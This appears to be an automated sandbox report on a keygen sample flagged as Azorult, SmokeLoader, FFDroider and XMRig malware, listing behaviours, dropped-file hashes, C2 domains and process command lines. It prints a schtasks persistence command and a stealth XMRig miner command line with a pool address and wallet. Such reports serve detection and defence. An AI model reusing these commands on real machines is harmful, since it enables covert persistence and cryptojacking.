Analysis Overview
SHA256
4c269e43d99dbd557bd75b79ddf1ca143d006de9b096936403e75b1178751f66
Threat Level: Known bad
The file 4c269e43d99dbd557bd75b79ddf1ca143d006de9b096936403e75b1178751f66 was found to be: Known bad.
Malicious Activity Summary
Privateloader family
Azorult
Detect Fabookie payload
FFDroider payload
SmokeLoader
OnlyLogger
Fabookie family
Ffdroider family
GCleaner
Onlylogger family
Azorult family
Gcleaner family
xmrig
Xmrig family
Fabookie
Smokeloader family
FFDroider
OnlyLogger payload
XMRig Miner payload
Deletes itself
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of SetThreadContext
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Program crash
System Location Discovery: System Language Discovery
Runs ping.exe
Scheduled Task/Job: Scheduled Task
Modifies system certificate store
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-10 13:01
Signatures
Azorult family
Privateloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240903-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Azorult
Azorult family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | kvaka.li | udp |
Files
memory/2140-0-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
150s
Command Line
Signatures
Azorult
Azorult family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
memory/3252-0-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240903-en
Max time kernel
57s
Max time network
125s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2668 wrote to memory of 2944 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe |
| PID 2668 wrote to memory of 2944 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe |
| PID 2668 wrote to memory of 2944 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe |
| PID 2668 wrote to memory of 2944 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe"
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe" -a
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240903-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Ffdroider family
Reads user/profile data of web browsers
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 186.2.171.3:80 | tcp |
Files
memory/2068-0-0x0000000000400000-0x0000000000667000-memory.dmp
memory/2068-1-0x0000000000020000-0x0000000000023000-memory.dmp
memory/2068-3-0x0000000000400000-0x0000000000667000-memory.dmp
memory/2068-6-0x0000000000400000-0x0000000000667000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240729-en
Max time kernel
16s
Max time network
20s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | one-online-gam3s.com | udp |
| US | 8.8.8.8:53 | oneeuropegroup.xyz | udp |
| US | 8.8.8.8:53 | gensolutions.bar | udp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| US | 104.21.79.229:443 | 2no.co | tcp |
Files
memory/2212-0-0x000007FEF64B3000-0x000007FEF64B4000-memory.dmp
memory/2212-1-0x0000000001070000-0x000000000108E000-memory.dmp
memory/2212-2-0x0000000000350000-0x000000000036A000-memory.dmp
memory/2212-3-0x000007FEF64B0000-0x000007FEF6E9C000-memory.dmp
memory/2212-4-0x000007FEF64B0000-0x000007FEF6E9C000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
Xmrig family
xmrig
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jhuuee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4940 set thread context of 5048 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"
C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 944
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 960
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1140
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2264 -ip 2264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1208
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | remotenetwork.xyz | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | startupmart.bar | udp |
| US | 8.8.8.8:53 | best-supply-link.xyz | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.149.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cleaner-partners.biz | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| FR | 163.172.171.111:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 111.171.172.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 163.172.154.142:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 142.154.172.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
Files
memory/1016-0-0x0000000074F9E000-0x0000000074F9F000-memory.dmp
memory/1016-1-0x00000000009A0000-0x0000000000B76000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
| MD5 | 4b0d49f7c8712d7a0d44306309f2e962 |
| SHA1 | 5f0a2536f215babccf860c7ccdeaf7055bb59cad |
| SHA256 | f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60 |
| SHA512 | 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b |
memory/4068-13-0x00007FFCC7303000-0x00007FFCC7305000-memory.dmp
memory/4068-15-0x0000000000840000-0x0000000000850000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
| MD5 | 13e802bd360e44591d7d23036ce1fd33 |
| SHA1 | 091a58503734848a4716382862526859299ef345 |
| SHA256 | e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b |
| SHA512 | 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b |
C:\Users\Admin\AppData\Local\Temp\2.exe
| MD5 | a5bace3c3c2fa1cb766775746a046594 |
| SHA1 | 9998cad5ba39e0be94347fcd2a2affd0c0a25930 |
| SHA256 | 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6 |
| SHA512 | 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184 |
memory/3412-39-0x00000000004F0000-0x00000000004F8000-memory.dmp
memory/1696-38-0x0000000000DE0000-0x0000000000E00000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 0ebb4afbb726f3ca17896a0274b78290 |
| SHA1 | b543a593cfa0cc84b6af0457ccdc27c1b42ea622 |
| SHA256 | 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2 |
| SHA512 | 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11 |
memory/1696-45-0x00000000016A0000-0x00000000016BA000-memory.dmp
memory/1696-49-0x00007FFCC7300000-0x00007FFCC7DC1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
| MD5 | f9be28007149d38c6ccb7a7ab1fcf7e5 |
| SHA1 | eba6ac68efa579c97da96494cde7ce063579d168 |
| SHA256 | 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914 |
| SHA512 | 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171 |
memory/1696-60-0x00007FFCC7300000-0x00007FFCC7DC1000-memory.dmp
memory/4068-61-0x00007FFCC7303000-0x00007FFCC7305000-memory.dmp
memory/2264-62-0x0000000000400000-0x0000000002B59000-memory.dmp
memory/4068-65-0x00000000011F0000-0x00000000011FE000-memory.dmp
memory/4068-66-0x0000000001240000-0x0000000001252000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 9910203407b2605107587e954081c575 |
| SHA1 | 8037bfb3b779fbbb3273df4f5c63d15b9589ce95 |
| SHA256 | 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49 |
| SHA512 | ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be |
memory/3696-96-0x0000000000B90000-0x0000000000B96000-memory.dmp
memory/5048-98-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-101-0x00000000029B0000-0x00000000029D0000-memory.dmp
memory/5048-100-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-104-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-105-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-103-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-102-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-106-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-107-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-109-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-110-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-116-0x0000000140000000-0x0000000140786000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240903-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2648 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2648 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2648 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2648 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2724 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
